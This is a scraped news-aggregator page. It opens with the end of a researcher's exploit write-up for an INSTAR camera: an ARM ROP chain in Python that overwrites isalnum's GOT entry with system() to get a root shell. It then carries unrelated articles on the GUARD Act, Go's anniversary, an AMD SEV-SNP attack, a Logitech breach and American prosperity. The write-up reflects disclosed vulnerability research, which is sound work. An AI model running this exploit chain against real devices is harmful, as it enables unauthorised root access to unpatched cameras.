The function epilogue of the vulnerable base64 function conveniently allows us to populate r4 to r11 before jumping to the first gadget. So in this case I added some values to r6, r9 and r11 for later use.

p = b""
p += 516 * b"A"
p += b"BBBB" # r4
p += b"CCCC" # r5
p += p32(0x1cad0) # r6
p += b"EEEE" # r7
p += b"FFFF" # r8
p += p32(0x190ac) # r9 (sb)
p += b"HHHH" # r10 (sl)
p += p32(0x13230) # r11 (fp) -> offset system - isalnum

As a first step of the chain, we do some preparations.

# 0x00028a08: mov r0, r6; pop {r4, r5, r6, pc};
p += p32(0x28a08)
p += b"XXXX" # r4
p += b"XXXX" # r5
p += b"XXXX" # r6

# 0x0001459c: pop {r3, pc};
p += p32(0x1459c)
p += p32(ISALNUM_GOT - 0x10) # r3

# 0x0002a33c: mov r2, sp; str r0, [sp, #4]; mov r0, r3; blx sb;
p += p32(0x2a33c)
p += b"AAAA" # <- sp

What we do here is basically this:

r0 = r6 = 0x1cad0
r3 = ISALNUM_GOT - 0x10
r2 = sp
*(sp + 4) = r0 = 0x1cad0
r0 = r3 = ISALNUM_GOT - 0x10
*(0x190ac)()

Note that we store isalnum@got in r3 so the following gadget can dereference it into r6. As discussed before we have to make sure that r2 contains a stack pointer so the chain can continue with blx r3 .

# 0x000190ac: ldr r6, [r3, #0x10]; ldr r3, [r2, #4]; blx r3;
r6 = *(r3 + 0x10) = *(ISALNUM_GOT - 0x10 + 0x10) = *ISALNUM_GOT
r3 = *(r2 + 0x4) = *(sp + 0x4)
*(sp + 0x4)() # -> 0x1cad0

As shown above *(sp + 0x4) is overwritten at runtime, so we need to make sure there is some scratch space on the stack so everything adds up properly.

When jumping to the gadget at 0x1cad0 the stack looks like this:

Address Value
0x1000FFF8 0x1459c
0x1000FFF4 0x1cad0
0x1000FFF0 AAAA <- stack pointer

The stack pointer still points at the AAAA value. So we continue with some readjustments of the stack pointer and preparations of the r3 register.

# 0x0001cad0: pop {r4, r5, pc};
p += b"XXXX" # r5 (scratch space)

# 0x0001459c: pop {r3, pc};
p += p32(0x1459c)
p += p32(0x27d14) # r3

Next up is the discussed gadget to add isalnum ’s address and the calculated offset. The offset was already put into fp (r11) at the very beginning of the chain. Register r6 also contains isalnum ’s real address read from the GOT by now.

# 0x000228d8: add r6, fp, r6; ldrb sb, [ip, #1]; ldr sl, [ip, #2]; blx r3;
p += p32(0x228d8)
r6 = r6 + fp = *ISALNUM_GOT + 0x13230 = system
sb = *(ip + 0x1)
sl = *(ip + 0x2)
*(0x27d14)()

The ip register can be disregarded as it won’t be used later and conveniently contained an address that points to the stack. Since we’re just reading from it, it also doesn’t invoke any undesirable side effects.

# 0x00027d14: mov r0, r6; add sp, sp, #0x3c; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc};
p += 0x3c * b"P"
p += p32(ISALNUM_GOT - 4) # r4 -> target - 4
p += b"XXXX" # r5
p += b"XXXX" # r6
p += b"XXXX" # r7
p += b"XXXX" # r8
p += b"XXXX" # sb
p += b"XXXX" # sl
p += b"XXXX" # fp

As a next step we have a gadget that moves r6 into r0. So we move the calculated address (= system ) into r0. Also, we prepare the r4 register for the next step. To deal with the side effects of this gadget some more padding is added.

r0 = r6 = system
sp = sp + 0x3c
r4 = ISALNUM_GOT - 4

Finally, we reach the gadget that writes our calculated system address back to the GOT.

# 0x0002a3f8: str r0, [r4, #4]; pop {r4, r5, r6, pc};
p += p32(0x2a3f8)
p += b"XXXX" # r4
p += b"XXXX" # r5
p += p32(ISALNUM_PLT) # r6

To our convenience it also allows us to write isalnum@plt to r6.

*(r4 + 0x4) = r0 = *(ISALNUM_GOT - 0x4 + 0x4) = system
r6 = ISALNUM_PLT

From here there isn’t much left to do. We move the stack pointer into r0 (first argument) and then call r6 which we previously populated with the address of system .

# 0x0001fb04: mov r0, sp; blx r6;
p += p32(0x1fb04)
p += CMD.encode()
p += b"\x00"

Let’s test things out:

Final exploit to gain a root shell on target device

RCE!

Why Didn’t You Just … ?

Attentive readers might have noticed this is a 32-bit binary, so why not just brute-force the address of system() ? This was indeed possible, because the address space on 32-bit systems is significantly smaller than on 64-bit systems, so the number of possible locations of libc is also a lot smaller. I used this approach for the first version of the exploit, which worked fine. However, while probing for the correct address the exploit keeps crashing the target binary. If we think about a red team scenario, this approach would be very noisy and should therefore be avoided. That’s why I decided to work out a more reliable exploit.

Wrapping up

We’ve now walked the full path from firmware extraction and analysis, through vulnerability identification, and exploitation. I hope reading this was as enjoyable for you as the actual research was for me.

All vulnerabilities discovered during this research were reported through a responsible-disclosure process. Thanks to INSTAR for their prompt response; they fixed the issues and released an update within a short period of time. The 90-day disclosure period has elapsed, and along with this write-up the exploit is now publicly available here .

Other News

A Surveillance Mandate Disguised As Child Safety: Why the GUARD Act Won't Keep Us Safe

Electronic Frontier Foundation
www.eff.org
2025-11-14 22:34:18
A new bill sponsored by Sen. Hawley (D-MO), Sen. Blumenthal (D-CT), Sen. Britt (R-AL), Sen. Warner (D-VA), and Sen. Murphy (D-CT) would require AI chatbots to verify all users’ ages, prohibit minors from using AI tools, and implement steep criminal penalties for chatbots that promote or solicit cert...
Original Article

A new bill sponsored by Sen. Hawley (R-MO), Sen. Blumenthal (D-CT), Sen. Britt (R-AL), Sen. Warner (D-VA), and Sen. Murphy (D-CT) would require AI chatbots to verify all users’ ages, prohibit minors from using AI tools, and implement steep criminal penalties for chatbots that promote or solicit certain harms. That might sound reasonable at first, but behind those talking points lies a sprawling surveillance and censorship regime that would reshape how people of all ages use the internet.

The GUARD Act may look like a child-safety bill, but in practice it’s an age-gating mandate that could be imposed on nearly every public-facing AI chatbot—from customer-service bots to search-engine assistants. The GUARD Act could force countless AI companies to collect sensitive identity data, chill online speech, and block teens from using the digital tools that they rely on every day.

EFF has warned for years that age-verification laws endanger free expression, privacy, and competition. There are legitimate concerns about transparency and accountability in AI, but the GUARD Act’s sweeping mandates are not the solution.


Young People's Access to Legitimate AI Tools Could Be Cut Off Entirely.

The GUARD Act doesn’t give parents a choice—it simply blocks minors from AI companions altogether. If a chat system’s age-verification process determines that a user is under 18, that user must then be locked out completely. The GUARD Act contains no parental consent mechanism, no appeal process for errors in age estimation, and no flexibility for any other context.

The bill’s definition of an AI “companion” is ambiguous enough that it could easily be interpreted to extend beyond general-use LLMs like ChatGPT, causing overcautious companies to block young people from other kinds of AI services too. In practice, this means that under the GUARD Act, teenagers may not be able to use chatbots to get help with homework, seek customer service assistance for a product they bought, or even ask a search engine a question. It could also cut off all young people’s access to educational and creative tools that have quickly become a part of everyday learning and life online.

By treating all young people—whether seven or seventeen—the same, the GUARD Act threatens their ability to explore their identities, get answers to questions free from shame or stigma, and gradually develop a sense of autonomy as they mature into adults. Denying teens’ access to online spaces doesn’t make them safer , it just keeps them uninformed and unprepared for adult life.

The GUARD Act’s sponsors claim these rules will keep our children safe, but that’s not true. Instead, it will undermine both safety and autonomy by replacing parental guidance with government mandates and building mass surveillance infrastructure instead of privacy controls.

All Age Verification Systems Are Dangerous. This Is No Different.

Teens aren’t the only ones who lose out under the GUARD Act. The bill would require platforms to confirm the ages of all users—young and old—before allowing them to speak, learn, or engage with their AI tools.

Under the GUARD Act, platforms can’t rely on a simple “I’m over 18” checkbox or self-attested birthdate. Instead, they must build or buy a “commercially reasonable” age-verification system that collects identifying information (like a government ID, credit record, or biometric data) from every user before granting them access to the AI service. Though the GUARD Act does contain some data minimization language, its mandate to periodically re-verify users means that platforms must either retain or re-collect that sensitive user data as needed. Both of those options come with major privacy risks.

EFF has long documented the dangers of age-verification systems:

  • They create attractive targets for hackers. Third-party services that collect users’ sensitive ID and biometric data for the purpose of age verification have been repeatedly breached , exposing millions to identity theft and other harms.
  • They implement mass surveillance systems and ruin anonymity . To verify your age, a system must determine and record who you are. That means every chatbot interaction could feasibly be linked to your verified identity.
  • They disproportionately harm vulnerable groups. Many people—especially activists and dissidents, trans and gender-nonconforming folks, undocumented people, and survivors of abuse—avoid systems that force identity disclosure. The GUARD Act would entirely cut off their ability to use these public AI tools.
  • They entrench Big Tech . Only the biggest companies can afford the compliance and liability burden of mass identity verification. Smaller, privacy-respecting developers simply can’t compete.

As we’ve said repeatedly, there’s no such thing as “safe” age verification. Every approach—whether it’s facial or biometric scans , government ID uploads, or behavioral or account analysis—creates new privacy, security, and expressive harms.

Vagueness + Steep Fines = Censorship. Full Stop.

Though mandatory age-gates provide reason enough to oppose the GUARD Act, the definitions of “AI chatbot” and “AI companion” are also vague and broad enough to raise alarms. In a nutshell, the Act’s definitions of these two terms are so expansive that they could cover nearly any system capable of generating “human-like” responses including not just general-purpose LLMs like ChatGPT, but also more tailored services like those used for customer service interactions, search-engine summaries, and subject-specific research tools.

The bill defines an “AI chatbot” as any service that produces “adaptive” or “context-responsive” outputs that aren’t fully predetermined by a developer or operator. That could include Google’s search summaries, research tools like Perplexity, or any AI-powered Q&A tool—all of which respond to natural language prompts and dynamically generate conversational text.

Meanwhile, the GUARD Act’s definition of an “AI companion”—a system that both produces “adaptive” or “context-responsive” outputs and encourages or simulates “interpersonal or emotional interaction”—will easily sweep in general-purpose tools like ChatGPT. Courts around the country are already seeing claims that conversational AI tools manipulate users’ emotions to increase engagement. Under this bill, that’s enough to trigger the “AI companion” label, putting AI developers at risk even when they do not intend to cause harm.

Both of these definitions are imprecise and unconstitutionally overbroad. And, when combined with the GUARD Act’s incredibly steep fines (up to $100,000 per violation, enforceable by the federal Attorney General and every state AG), companies worried about their legal liability will inevitably err on the side of prohibiting minors from accessing their chat systems. The GUARD Act leaves them these options: censor certain topics en masse, entirely block users under 18 from accessing their services, or implement broad-sweeping surveillance systems as a prerequisite to access. No matter which way platforms choose to go, the inevitable result for users is less speech, less privacy, and less access to genuinely helpful tools.

How You Can Help

While there may be legitimate problems with AI chatbots, young people’s safety is an incredibly complex social issue both on- and off-line. The GUARD Act tries to solve this complex problem with a blunt, dangerous solution.

In other words, protecting young people’s online safety is incredibly important, but forcing invasive ID checks, criminalizing AI tools, and banning teens from legitimate digital spaces is the wrong way to do it.

The GUARD Act would make the internet less free, less private, and less safe for everyone. It would further consolidate power and resources in the hands of the bigger AI companies, crush smaller developers, and chill innovation under the threat of massive fines. And it would cut off vulnerable groups’ ability to use helpful everyday AI tools, further stratifying the internet we know and love.

Lawmakers should reject the GUARD Act and focus instead on policies that provide transparency, more options for users, and comprehensive privacy for all. Help us tell Congress to oppose the GUARD Act today.


Go's Sweet 16

Hacker News
go.dev
2025-11-14 22:33:15
Comments...
Original Article

This past Monday, November 10th, we celebrated the 16th anniversary of Go’s open source release!

We released Go 1.24 in February and Go 1.25 in August, following our now well-established and dependable release cadence. Continuing our mission to build the most productive language platform for building production systems, these releases included new APIs for building robust and reliable software, significant advances in Go’s track record for building secure software, and some serious under-the-hood improvements. Meanwhile, no one can ignore the seismic shifts in our industry brought by generative AI. The Go team is applying its thoughtful and uncompromising mindset to the problems and opportunities of this dynamic space, working to bring Go’s production-ready approach to building robust AI integrations, products, agents, and infrastructure.

Core language and library improvements

First released in Go 1.24 as an experiment and then graduated in Go 1.25, the new testing/synctest package significantly simplifies writing tests for concurrent, asynchronous code. Such code is particularly common in network services, and is traditionally very hard to test well. The synctest package works by virtualizing time itself. It takes tests that used to be slow, flaky, or both, and makes them easy to rewrite into reliable and nearly instantaneous tests, often with just a couple extra lines of code. It’s also a great example of Go’s integrated approach to software development: behind an almost trivial API, the synctest package hides a deep integration with the Go runtime and other parts of the standard library.
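
To make the idea concrete, here is a minimal sketch of what such a test can look like; the five-second timeout, the package name, and the test name are illustrative assumptions, not taken from the post.

package example_test

import (
    "context"
    "testing"
    "testing/synctest"
    "time"
)

// Inside the synctest bubble, time is virtualized: the six-second sleep
// returns as soon as every goroutine in the bubble is durably blocked,
// so the timeout below expires without any real waiting.
func TestTimeoutExpires(t *testing.T) {
    synctest.Test(t, func(t *testing.T) {
        ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
        defer cancel()

        time.Sleep(6 * time.Second) // advances the fake clock, not real time
        synctest.Wait()             // wait for background goroutines in the bubble to settle

        if ctx.Err() != context.DeadlineExceeded {
            t.Fatalf("ctx.Err() = %v, want DeadlineExceeded", ctx.Err())
        }
    })
}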

This isn’t the only boost the testing package got over the past year. The new testing.B.Loop API is both easier to use than the original testing.B.N API and addresses many of the traditional—and often invisible!—pitfalls of writing Go benchmarks. The testing package also has new APIs that make it easy to clean up in tests that use Context, and that make it easy to write to the test’s log.
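
A short sketch of the new benchmark pattern; the benchmarked call and input are arbitrary choices, only the loop shape matters.

package example

import (
    "strings"
    "testing"
)

// b.Loop replaces the classic "for i := 0; i < b.N; i++" idiom. Setup before
// the loop runs only once, and the call inside the loop is kept live so the
// compiler cannot optimize the benchmarked work away.
func BenchmarkFields(b *testing.B) {
    input := strings.Repeat("go gopher ", 1024)
    for b.Loop() {
        strings.Fields(input)
    }
}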

Go and containerization grew up together and work great with each other. Go 1.25 launched container-aware scheduling, making this pairing even stronger. Without developers having to lift a finger, this transparently adjusts the parallelism of Go workloads running in containers, preventing CPU throttling that can impact tail latency and improving Go’s out-of-the-box production-readiness.

Go 1.25’s new flight recorder builds on our already powerful execution tracer, enabling deep insights into the dynamic behavior of production systems. While the execution tracer generally collected too much information to be practical in long-running production services, the flight recorder is like a little time machine, allowing a service to snapshot recent events in great detail after something has gone wrong.

Secure software development

Go continues to strengthen its commitment to secure software development, making significant strides in its native cryptography packages and evolving its standard library for enhanced safety.

Go ships with a full suite of native cryptography packages in the standard library, which reached two major milestones over the past year. A security audit conducted by independent security firm Trail of Bits yielded excellent results, with only a single low-severity finding. Furthermore, through a collaborative effort between the Go Security Team and Geomys, these packages achieved CAVP certification, paving the way for full FIPS 140-3 certification. This is a vital development for Go users in certain regulated environments. FIPS 140 compliance, previously a source of friction due to the need for unsupported solutions, will now be seamlessly integrated, addressing concerns related to safety, developer experience, functionality, release velocity, and compliance.

The Go standard library has continued to evolve to be safe by default and safe by design. For example, the os.Root API—added in Go 1.24—enables traversal-resistant file system access, effectively combating a class of vulnerabilities where an attacker could manipulate programs into accessing files intended to be inaccessible. Such vulnerabilities are notoriously challenging to address without underlying platform and operating system support, and the new os.Root API offers a straightforward, consistent, and portable solution.
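
A minimal sketch of how os.Root can be used; the directory and file names are made up for illustration.

package main

import (
    "fmt"
    "log"
    "os"
)

func main() {
    // Every open below is resolved strictly inside /srv/uploads, so a name
    // like "../../etc/passwd" or a symlink escaping the root is rejected.
    root, err := os.OpenRoot("/srv/uploads")
    if err != nil {
        log.Fatal(err)
    }
    defer root.Close()

    f, err := root.Open("report.txt")
    if err != nil {
        log.Fatal(err)
    }
    defer f.Close()
    fmt.Println("opened", f.Name())
}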

Under-the-hood improvements

In addition to user-visible changes, Go has made significant improvements under the hood over the past year.

For Go 1.24, we completely redesigned the map implementation, building on the latest and greatest ideas in hash table design. This change is completely transparent, and brings significant improvements to map performance, lower tail latency of map operations, and in some cases even significant memory wins.

Go 1.25 includes an experimental and significant advancement in Go’s garbage collector called Green Tea. Green Tea reduces garbage collection overhead in many applications by at least 10% and sometimes as much as 40%. It uses a novel algorithm designed for the capabilities and constraints of today’s hardware and opens up a new design space that we’re eagerly exploring. For example, in the forthcoming Go 1.26 release, Green Tea will achieve an additional 10% reduction in garbage collector overhead on hardware that supports AVX-512 vector instructions—something that would have been nigh impossible to take advantage of in the old algorithm. Green Tea will be enabled by default in Go 1.26; users need only upgrade their Go version to benefit.

Furthering the software development stack

Go is about far more than the language and standard library. It’s a software development platform, and over the past year, we’ve also made four regular releases of the gopls language server, and have formed partnerships to support emerging new frameworks for agentic applications.

Gopls provides Go support to VS Code and other LSP-powered editors and IDEs. Every release sees a litany of features and improvements to the experience of reading and writing Go code (see the v0.17.0, v0.18.0, v0.19.0, and v0.20.0 release notes for full details, or our new gopls feature documentation!). Some highlights include many new and enhanced analyzers to help developers write more idiomatic and robust Go code; refactoring support for variable extraction, variable inlining, and JSON struct tags; and an experimental built-in server for the Model Context Protocol (MCP) that exposes a subset of gopls’ functionality to AI assistants in the form of MCP tools.

With gopls v0.18.0, we began exploring automatic code modernizers. As Go evolves, every release brings new capabilities and new idioms; new and better ways to do things that Go programmers have been finding other ways to do. Go stands by its compatibility promise—the old way will continue to work in perpetuity—but nevertheless this creates a bifurcation between old idioms and new idioms. Modernizers are static analysis tools that recognize old idioms and suggest faster, more readable, more secure, more modern replacements, and do so with push-button reliability. What gofmt did for stylistic consistency, we hope modernizers can do for idiomatic consistency. We’ve integrated modernizers as IDE suggestions, where they can help developers not only maintain more consistent coding standards, but where we believe they will help developers discover new features and keep up with the state of the art. We believe modernizers can also help AI coding assistants keep up with the state of the art and combat their proclivity to reinforce outdated knowledge of the Go language, APIs, and idioms. The upcoming Go 1.26 release will include a total overhaul of the long-dormant go fix command to make it apply the full suite of modernizers in bulk, a return to its pre-Go 1.0 roots.

At the end of September, in collaboration with Anthropic and the Go community, we released v1.0.0 of the official Go SDK for the Model Context Protocol (MCP). This SDK supports both MCP clients and MCP servers, and underpins the new MCP functionality in gopls. Contributing this work in open source helps empower other areas of the growing open source agentic ecosystem built around Go, such as the recently released Agent Development Kit (ADK) for Go from Google. ADK Go builds on the Go MCP SDK to provide an idiomatic framework for building modular multi-agent applications and systems. The Go MCP SDK and ADK Go demonstrate how Go’s unique strengths in concurrency, performance, and reliability differentiate Go for production AI development, and we expect more AI workloads to be written in Go in the coming years.

Looking ahead

Go has an exciting year ahead of it.

We’re working on advancing developer productivity through the brand new go fix command, deeper support for AI coding assistants, and ongoing improvements to gopls and VS Code Go. General availability of the Green Tea garbage collector, native support for Single Instruction Multiple Data (SIMD) hardware features, and runtime and standard library support for writing code that scales even better to massive multicore hardware will continue to align Go with modern hardware and improve production efficiency. We’re focusing on Go’s “production stack” libraries and diagnostics, including a massive (and long in the making) upgrade to encoding/json, driven by Joe Tsai and people across the Go community; leaked goroutine profiling, contributed by Uber’s Programming Systems team; and many other improvements to net/http, unicode, and other foundational packages. We’re working to provide well-lit paths for building with Go and AI, evolving the language platform with care for the evolving needs of today’s developers, and building tools and capabilities that help both human developers and AI assistants and systems alike.

On this 16th anniversary of Go’s open source release, we’re also looking to the future of the Go open source project itself. From its humble beginnings, Go has formed a thriving contributor community. To continue to best meet the needs of our ever-expanding user base, especially in a time of upheaval in the software industry, we’re working on ways to better scale Go’s development processes—without losing sight of Go’s fundamental principles—and more deeply involve our wonderful contributor community.

Go would not be where it is today without our incredible user and contributor communities. We wish you all the best in the coming year!

The Bill to Ban Carriage Horses Is Dead

hellgate
hellgatenyc.com
2025-11-14 22:29:07
"To bring us here on a Friday for a shotgun vote is just not how you do business in the City Council."...
Original Article

A bill that would ban horse-drawn carriages in Central Park was defeated in committee on Friday, after the bill's main sponsor invoked an obscure City Council rule to force the committee to discuss it.

The City Council's Health Committee meeting—which, because of the unusual way it was convened, did not include an opportunity for public comment—was called for by Queens Councilmember Bob Holden, the lead sponsor of Ryder's Law.

Holden, who does not sit on the Health Committee, opened his remarks with a quote from Mahatma Gandhi: "The greatness of a society can be judged by the way its animals are treated." He then lambasted his council colleagues for failing to consider his bill, which he first proposed in 2022.

"This committee chose not to have a hearing on this bill for four years. That's a disgrace," Holden said. "There's discrimination going on here. We know it, and it's disgusting." Holden then motioned to schedule a public hearing—and when Queens Councilmember Lynn Schulman, the Health Committee chair, replied that committee members were going to give comment instead, Holden insisted he would file an injunction for discrimination.

Despite the best efforts of First Deputy Mayor Randy Mastro, the only councilmembers besides Holden who spoke favorably about Ryder's Law were Chris Marte and Eric Bottcher—neither of whom is on the Health Committee, and both of whom had appeared at a New Yorkers for Clean, Livable, and Safe Streets (NYCLASS) rally outside City Hall on Wednesday.

"Look, we're in 2025. If it was a human pushing a horse carriage, we would call that inhumane. If it was any other living animal, whether it was dogs or cats, pushing a carriage, we would call that inhumane," Marte said. "Why do we have to put horses at a different level? That's why I support this bill."

But the Health Committee members who spoke at the meeting all expressed varying degrees of skepticism towards the legislation.


RMPocalypse Attack: How a Catch-22 Breaks AMD SEV-SNP

Lobsters
rmpocalypse.github.io
2025-11-14 22:24:31
Comments...
Original Article

RMPocalypse: How a Catch-22 Breaks AMD SEV-SNP (ACM CCS 2025)

Summary

Confidential computing allows customers to off-load their computation to the cloud without having to trust the cloud provider. One of the approaches to enable confidential computing is by anchoring the trust in the hardware. AMD’s SEV-SNP, one such hardware mechanism, supports confidential computing by creating confidential virtual machines. With RMPocalypse, we demonstrate an attack on all AMD processors that support SEV-SNP (Zen 3/4/5) that compromises all confidential computing guarantees. The Reverse Map Table (RMP) is one of the main protection mechanisms in SEV-SNP that stops the hypervisor from accessing the confidential virtual machines. In RMPocalypse, we exploit AMD’s incomplete protections to perform a single memory write to the RMP, thus breaking SEV-SNP.

What is AMD SEV-SNP?

Secure Encrypted Virtualization-Secure Nested Paging, SEV-SNP for short, is AMD’s latest hardware extension to support confidential computing.

What is RMP?

SEV-SNP uses a data structure called the Reverse Map Table (RMP) to store security metadata for all DRAM pages in the system. Since the RMP can be large, it is stored in DRAM. Now you might ask, who protects the RMP? Well, the RMP! Easier said than done, as this design choice by AMD creates a chicken-and-egg problem. The main challenge lies in the initialization: while the RMP is being set up in DRAM, there has to be an orthogonal mechanism in place to make sure this is done correctly. Only after a successful initialization can the RMP protect itself (and of course the confidential VMs). AMD has an elegant solution to this problem. They use a security co-processor called the PSP to initialize the RMP. During initialization, platform protection mechanisms configured by the PSP protect the RMP.

What went wrong?

RMPocalypse shows that AMD’s platform protection mechanisms are not complete, thus leaving a small window of opportunity for the attacker to maliciously overwrite the RMP on initialization. Due to the design of the RMP, a single overwrite of 8 bytes within the RMP causes the entire RMP to become subsequently compromised. With a compromised RMP, all integrity guarantees of SEV-SNP become void. RMPocalypse case studies show that an attacker-controlled RMP not only voids the integrity but also results in a full breach of confidentiality.

What can an attacker do with this vulnerability?

We showcase RMPocalypse primitives by forging attestation values, enabling debug, reading and writing arbitrary encrypted CVM memory, and replaying the CVM register state.

Attack Overview

AMD performs an initialization step when the hypervisor wants to enable SEV-SNP on the platform. Setting up the RMP is one of the critical steps in this initialization. Thus, during initialization, AMD blocks all the memory accesses to the memory region that holds the RMP data structure. In particular, AMD uses so-called Trusted Memory Regions (TMRs) to block any access from untrusted components (e.g., x86 cores).

In our analysis of the RMP initialization, we observed that a malicious hypervisor running on the x86 cores can still create dirty cachelines pointing to DRAM. As the TMR barrier only stops the memory access at the memory controller level, it cannot stop cache pollution. Note that this in itself does not compromise SEV-SNP yet, since the RMP is still intact in memory at this point, and if the attacker tries to flush the entry, the TMR will block it. It is only after initialization, when AMD lifts the TMR barrier, that we can perform the flush and the write goes through to the DRAM!

In summary, we identify the root-cause as the misalignment of different memory protection mechanisms on the platform.

High level overview of the RMPocalypse attack during SEV-SNP initialization

Figure (a) shows the main components of our attack with x86 cores and caches connected to the DRAM over an interconnect. During SEV-SNP init, as shown in (b), a malicious hypervisor creates dirty cachelines pointing to RMP memory. Then it lets the PSP set up the RMP as usual and waits for the acknowledgement that the initialization is complete. In particular, after writing to the RMP range, the PSP notifies the platform to switch from the TMR protection mechanism and start enforcing SEV-SNP semantics. Concretely, this means that the TMR access checks are lifted and the core starts enforcing RMP checks on memory accesses. However, these RMP checks occur before the memory write gets written to cache. Thus, all data within the cache is assumed to be valid and already compliant with the current security semantics. This leaves us with a time window during RMP initialization in which the x86 cores can flush the previously created dirty cacheline entries. They are subject to neither the TMR nor the RMP access control checks, thus bypassing both protection mechanisms. As depicted in (c), the malicious hypervisor can use this primitive to get arbitrary unchecked writes to RMP memory.

Attack Complexity

We perform the above RMP corruption during SEV-SNP initialization. RMPocalypse is deterministic, since our malicious write always goes through. Next, by choosing to corrupt the root RMP entry with this write, we can tamper with all RMP entries in the system and the logical state they belong to. Our paper presents a detailed analysis of the RMP states. But in short, the RMP write-protects a critical metadata page for CVMs. This page holds security-sensitive information, such as the debug-enable bit and the attestation hash. With the RMP checks practically disabled, we show how to corrupt these metadata pages to enable debug mode and bypass attestation. With each of these primitives, we can arbitrarily tamper with the execution of the confidential VMs and exfiltrate all secrets with a 100% success rate.

Further Information

Read the full academic paper for implementation details.


Logitech confirms data breach after Clop extortion attack

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 22:18:36
Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July. [...]...
Original Article

Logitech

Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July.

Logitech International S.A. is a Swiss multinational electronics company that sells hardware and software solutions, including computer peripherals, gaming, video collaboration, music, and smart home products.

Today, Logitech filed a Form 8-K with the U.S. Securities and Exchange Commission, confirming that data was stolen in a breach.


"Logitech International S.A. ("Logitech") recently experienced a cybersecurity incident relating to the exfiltration of data. The cybersecurity incident has not impacted Logitech's products, business operations or manufacturing," disclosed Logitech.

"Upon detecting the incident, Logitech promptly took steps to investigate and respond to the incident with the assistance of leading external cybersecurity firms."

Logitech says the data likely includes limited information about employees and consumers, as well as data relating to customers and suppliers, but the company does not believe hackers gained access to sensitive information such as national ID numbers or credit card information, as that data was not stored in the breached systems.

Logitech says that the breach occurred through a third-party zero-day vulnerability that was patched as soon as a fix was available.

This statement comes after the Clop extortion gang added Logitech to its data-leak extortion site last week, leaking almost 1.8 TB of data allegedly stolen from the company.

While the company does not name the software vendor, the breach was likely caused by an Oracle zero-day vulnerability exploited by the Clop extortion gang in July data-theft attacks.

Last month, Mandiant and Google began tracking a new extortion campaign in which numerous companies received emails from the Clop ransomware operation claiming that sensitive data had been stolen from their Oracle E-Business Suite systems.

These emails warned that the stolen data would be leaked if a ransom demand was not paid.

Clop extortion email sent to Oracle customers

Soon after, Oracle confirmed a new E-Business Suite zero-day, tracked as CVE-2025-61882, and issued an emergency update to fix the flaw.

The Clop extortion gang has a long history of exploiting zero-day flaws in massive data theft attacks, including earlier campaigns against the Accellion FTA, GoAnywhere MFT, MOVEit Transfer, and Cleo file transfer platforms.

Other organizations impacted by the 2025 Oracle E-Business Suite data theft attacks include Harvard, Envoy Air, and The Washington Post.

BleepingComputer contacted Logitech earlier this month and again today with questions regarding the breach and will update the story if we receive a response.


SSL Configuration Generator

Hacker News
ssl-config.mozilla.org
2025-11-14 22:15:04
Comments...
Original Article
Mozilla Configuration


30 Days, 9 Cities, 1 Question: Where Did American Prosperity Go?

Hacker News
kyla.substack.com
2025-11-14 21:56:55
Comments...
Original Article

Peter Thiel recently did an interview with the Free Press about his 2020 email to Mark Zuckerberg. The title of the piece is “Capitalism isn’t Working for Young People 1 ”. He has benefited from capitalism more than almost anyone alive. If he admits something has failed, we need to pay attention to it. It echoes something I’ve heard everywhere this year: people feel like the system isn’t working for them anymore. Housing, student debt, AI, trust in institutions - all of it is converging into a very real sense that prosperity has gone missing.

So I spent 30 days on the road to see what prosperity looks like up close. DC, Berkeley, Baltimore, New Hampshire, New York, two cities in Florida, then Prague and Kilkenny, Ireland. The same theme surfaced: people don’t feel the prosperity that’s supposedly surrounding them. They feel the physical friction.

What became clear almost immediately is that the prosperity is real, it’s just not showing up in the places people actually live. It exists in balance sheets, in stock portfolios, in data centers behind chain-link fences. But in daily life like in commutes, in childcare costs, in housing, in safety, in community, people are feeling decay. I kept running into the same contradiction: a wealthy country where everything visible seems to be slowly breaking while everything invisible keeps getting richer.

That tension shows up everywhere, even in the way people talk about politics and culture. Thiel ties the broader culture war to economics - the rise of the groyper, angry young men 2 , as detailed by Rod Dreher, is rooted in the economy. As Rod writes:

I asked one astute Zoomer what the Groypers actually wanted (meaning, what were their demands). He said, “They don’t have any. They just want to tear everything down.” […] The problems are mostly economic and material, in his view (and this is something echoed by other conversations). They don’t have good career prospects, they’ll probably never be able to buy a home, many are heavily indebted with student loans that they were advised by authorities to take out, and the idea that they are likely to marry and start families seems increasingly remote.

I’ve written about the economic situation facing young people before. It does seem like the same cluster of things: housing costs and the American Dream, the way social media turns everyone into a comparison engine, and the tech industry’s constant threat that you’re about to be replaced by an AI robot cyborg. Demographic shifts too - Americans aged 70 and older own almost 40% of all stocks in the US and those 55 and older own over half of all homes. It’s invisible prosperity and visible decay.

If you’re making decent money but your boss keeps hinting that AI might replace your job, and you can’t afford to buy a house in the city where you work, and the train you take doesn’t run on time (or you’re in 55 minutes of traffic or the bus never shows up or you feel unsafe or without community - you get it), you’re not going to feel prosperous. You’re going to feel like you’re treading water in a system that’s slowly giving up on you.

James Madison called institutional safeguards “auxiliary precautions” - backup systems for when civic virtue failed. But auxiliary systems only work if you can see them - if they’re trusted and functional. What happens when those safeguards themselves become invisible? When wealth compounds in hidden ways, in dark data centers, in algorithmic feeds, while the visible world like housing, transit, safety, community… cracks?

Everywhere I went, people were trying to repair something - sometimes literal infrastructure, sometimes something more abstract like a sense of purpose or a reason to believe the future might accommodate them. This is what I learned.

When I landed in DC, the first thing I saw was the National Guard by Union Station, with their tanks parked in front of marble columns, while a man in a clown costume filmed them. Power as performance, threat as theater, all filmed by the iPhone 17.

I was there for a Brookings conference on AI and work. Senator Chris Murphy opened with a warning about AI psychosis, the blurring line between real and synthetic life.

On-stage at Brookings

We’ve beta-tested a cognitive experiment on an entire generation without asking for permission: first social media, now AI. An unregulated behavioral test run by private companies at national scale. But there is increasing pushback - the villain in Toy Story 5 is an iPad , and I imagine that’s going to be the beginning of a cultural shift.

There are also ways to reorient this. Tim Wu has a good piece in the NYT on how we can rightsize the very concentrated tech platform-extraction model (Meta makes 10% of its revenue from ads for scams , for example), writing:

An entire generation has grown up thinking that extraction, as opposed to building, is the path to riches […] To recover the sense of optimism and opportunity that once characterized American commerce, Americans need to be confident that — even if they don’t work for a platform — they can reap what they sow.

Ann Manov captures what this extraction economy feels like in a recent piece :

